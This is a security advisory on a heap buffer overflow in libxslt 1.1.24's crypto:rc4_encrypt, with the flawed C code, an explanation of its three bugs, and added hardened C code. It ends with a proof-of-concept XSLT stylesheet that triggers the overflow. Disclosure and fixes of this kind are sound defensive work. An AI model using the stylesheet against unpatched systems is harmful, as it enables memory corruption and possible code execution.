A vulnerability in libxslt allows attackers that can supply an arbitrary XSLT file to cause the library to overflow an internal buffer, which in turn can be used to execute arbitrary code.
Credit:
The information has been provided by Chris Evans.
The original article can be found at: http://scary.beasts.org/security/CESA-2008-003.html
Vulnerable Systems:
* libxslt version 1.1.24
As with Chris's Ghostscript note, XSLT is a Turing-complete language, and executing untrusted programs written in such languages remains a challenge. The weak points on the attack surface are often the built-in extension functions, which do things like take integers and strings as arguments...
This advisory primarily notes a heap-based buffer overflow in the crypto:rc4_encrypt function in crypto.c. The issue is over-trust of the length of an incoming key string:
static void
exsltCryptoRc4EncryptFunction (xmlXPathParserContextPtr ctxt, int nargs) {
    ...
    key = xmlXPathPopString (ctxt);
    key_len = xmlUTF8Strlen (str);              /* measures the plaintext, not the key */
    ...
    padkey = xmlMallocAtomic (RC4_KEY_LENGTH);  /* fixed-size heap buffer */
    key_size = xmlUTF8Strsize (key, key_len);
    memcpy (padkey, key, key_size);             /* unbounded by RC4_KEY_LENGTH */
    memset (padkey + key_size, '\0', sizeof (padkey)); /* sizeof a pointer, not the buffer */
    ...
As can be seen, the padkey heap allocation is of a fixed size, but an arbitrary length string from the XSL function argument is copied on top.
In addition, the key_len variable appears to be initialized incorrectly. The length of the plaintext string is used rather than the length of the key string.
Furthermore, the attempt to zero-pad the key looks faulty. sizeof(padkey) will always be sizeof(void*).
The function crypto:rc4_decrypt would seem to suffer the same issues.
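Added example, not code from the advisory or from libxslt: a hardened version of the key-padding step that applies the three corrections the analysis above implies (measure the key itself, bound the copy by the allocation, zero the real remainder), plus an audit helper that reproduces the original length arithmetic for ASCII input so the data dependency between the two arguments is visible. RC4_KEY_LENGTH's value and the function names pad_rc4_key_safe, original_copy_excess and padded_key_accepted are assumptions made for this example.

```c
#include <stdlib.h>
#include <string.h>

/* Assumed value for this example; libxslt's crypto.c defines its own. */
#define RC4_KEY_LENGTH 128

/* Hypothetical hardened padding step. Compared with the quoted code:
 *   1. the key's own byte length is measured, not the plaintext's;
 *   2. a key longer than the allocation is rejected, never copied past it;
 *   3. the zero-padding covers the rest of the buffer, not sizeof(pointer).
 * Returns a RC4_KEY_LENGTH-byte buffer (caller frees it) or NULL. */
unsigned char *pad_rc4_key_safe(const char *key)
{
    size_t key_size = strlen(key);
    if (key_size > RC4_KEY_LENGTH)
        return NULL;
    unsigned char *padkey = malloc(RC4_KEY_LENGTH);
    if (padkey == NULL)
        return NULL;
    memcpy(padkey, key, key_size);
    memset(padkey + key_size, 0, RC4_KEY_LENGTH - key_size);
    return padkey;
}

/* Audit helper for ASCII input: xmlUTF8Strsize(key, xmlUTF8Strlen(plaintext))
 * yields the key's byte count capped at the plaintext's character count, so
 * the original copy only exceeds the allocation when BOTH arguments are long.
 * Returns how many bytes the original memcpy would write past the buffer. */
size_t original_copy_excess(size_t key_bytes, size_t plaintext_chars)
{
    size_t key_size = key_bytes < plaintext_chars ? key_bytes : plaintext_chars;
    return key_size > RC4_KEY_LENGTH ? key_size - RC4_KEY_LENGTH : 0;
}

/* Check routine: builds a constructed all-'A' key of n bytes and reports
 * 1 if the hardened function accepts it with correct padding, 0 if it is
 * rejected, -1 on allocation failure. */
int padded_key_accepted(size_t n)
{
    char *key = malloc(n + 1);
    if (key == NULL) return -1;
    memset(key, 'A', n);
    key[n] = '\0';
    unsigned char *pad = pad_rc4_key_safe(key);
    free(key);
    if (pad == NULL) return 0;
    int ok = 1;
    for (size_t i = 0; i < RC4_KEY_LENGTH; i++)
        if (pad[i] != (i < n ? 'A' : 0)) ok = 0;
    free(pad);
    return ok;
}
```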
Demo evil stylesheet:
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:str="http://exslt.org/strings"
    xmlns:crypto="http://exslt.org/crypto"
    xmlns:math="http://exslt.org/math"
    extension-element-prefixes="str crypto math">
  <xsl:template match="/">
<xsl:value-of select="crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')"/>
    blah
  </xsl:template>
</xsl:stylesheet>